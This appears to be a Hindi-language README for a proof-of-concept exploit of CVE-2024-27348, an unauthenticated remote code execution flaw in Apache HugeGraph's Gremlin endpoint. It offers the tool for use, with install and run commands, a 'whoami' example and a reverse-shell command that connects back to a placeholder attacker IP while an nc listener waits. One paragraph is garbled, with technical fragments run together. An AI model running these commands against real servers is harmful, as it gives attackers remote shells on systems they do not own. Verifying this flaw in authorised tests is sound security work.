
CVE-2024-27348 के लिए उन्नत PoC एक्सप्लॉइट, जो सैंडबॉक्स बाईपास और गैर-अंधा कमांड निष्पादन के माध्यम से Apache HugeGraph में विश्वसनीय RCE प्राप्त करता है।
CVE-2024-27348 (Apache HugeGraph सर्वर में रिमोट कोड एक्ज़ीक्यूशन) के लिए एक उन्नत, अत्यधिक विश्वसनीय प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट।
कई सार्वजनिक PoCs के विपरीत, जो आँख मूंदकर कमांड चलाते हैं या Java के Runtime.exec() की सीमाओं के कारण जटिल पेलोड पर विफल हो जाते हैं, यह स्क्रिप्ट वास्तविक दुनिया के पेनिट्रेशन टेस्टिंग परिदृश्यों में विश्वसनीयता के लिए डिज़ाइन की गई है।
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। यह टूल सुरक्षा शोधकर्ताओं, पेनिट्रेशन टेस्टर्स और सिस्टम एडमिनिस्ट्रेटरों के लिए प्रदान किया गया है ताकि वे अधिकृत वातावरण में इस भेद्यता को सत्यापित कर सकें। इस टूल के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।
यह एक्सप्लॉइट तीन महत्वपूर्ण मुद्दों को संबोधित करके प्रारंभिक सार्वजनिक PoCs से बेहतर है:
gremlin-server-exec-*task-worker-*BypassThreadRuntime.getRuntime().exec(String) के बजाय, जो जटिल bash कमांड्स (जैसे रिवर्स शेल) को स्पेस पर तोड़ देता है, यह एक्सप्लॉइट उचित रूप से स्वरूपित List<String> के साथ ProcessBuilder का उपयोग करता है। यह कोट्स और रिडायरेक्शन के साथ जटिल पेलोड के सुरक्षित निष्पादन की अनुमति देता है।Scanner का उपयोग करके निष्पादित प्रक्रिया के InputStream को पढ़ती है और JSON HTTP प्रतिक्रिया में कमांड का वास्तविक आउटपुट लौटाती है। आप वही देखते हैं जो सर्वर देखता है।requests लाइब्रेरीआवश्यक निर्भरताएँ स्थापित करें:
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
उदाहरण
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# अपनी अटैकर मशीन पर, एक लिसनर शुरू करें:
nc -lvnp 4444
# एक्सप्लॉइट चलाएँ:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Apache HugeGraph सर्वर एक Gremlin API एंडपॉइंट (/gremlin) उजागर करता है जो उपयोगकर्ताओं को Groovy स्क्रिप्ट सबमिट करने की अनुमति देता है। पैच किए जाने से पहले के संस्करणों में अपर्याप्त सैंडबॉक्सिंग के कारण, एक अनधिकृत हमलावर Java Reflection के माध्यम से मनमानी ऑपरेटिंग सिस्टम कमांड निष्पादित कर सकता है।